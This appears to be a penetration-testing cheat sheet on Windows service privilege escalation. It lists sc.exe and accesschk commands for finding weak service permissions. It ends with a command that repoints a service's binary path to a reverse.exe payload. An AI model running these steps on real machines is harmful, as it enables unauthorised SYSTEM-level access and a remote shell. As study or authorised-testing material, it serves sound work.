Basic Commands

# Query the configuration of a service
sc.exe qc $service_name

# Query the current status of a service
sc.exe query $service_name

# Modify an option on a service
sc.exe config $service_name $option= $value

# Start and stop a service
net start/stop $service_name

Accesschk.exe

Use Accesschk.exe to validate service permissions:

.\accesschk.exe /accepteula -uwcqv user $service_name

• What we are looking for in the output is the SERVICE_START and SERVICE_STOP permissions.

• We also want to confirm that it is running under a user with higher privileges (e.g., LocalSystem)

Notes

• Validate if you can start/stop the service or the machine. If you cannot then you may not be able to use it to escalate your privileges.

• Check if we can reboot the system with whoami /priv

• An easy way to escalate privileges utilizing a service is to modify the binaries path. The following demonstrates an example of this:

sc config $service_name binpath= "\"C:\Windows\Tasks\reverse.exe\""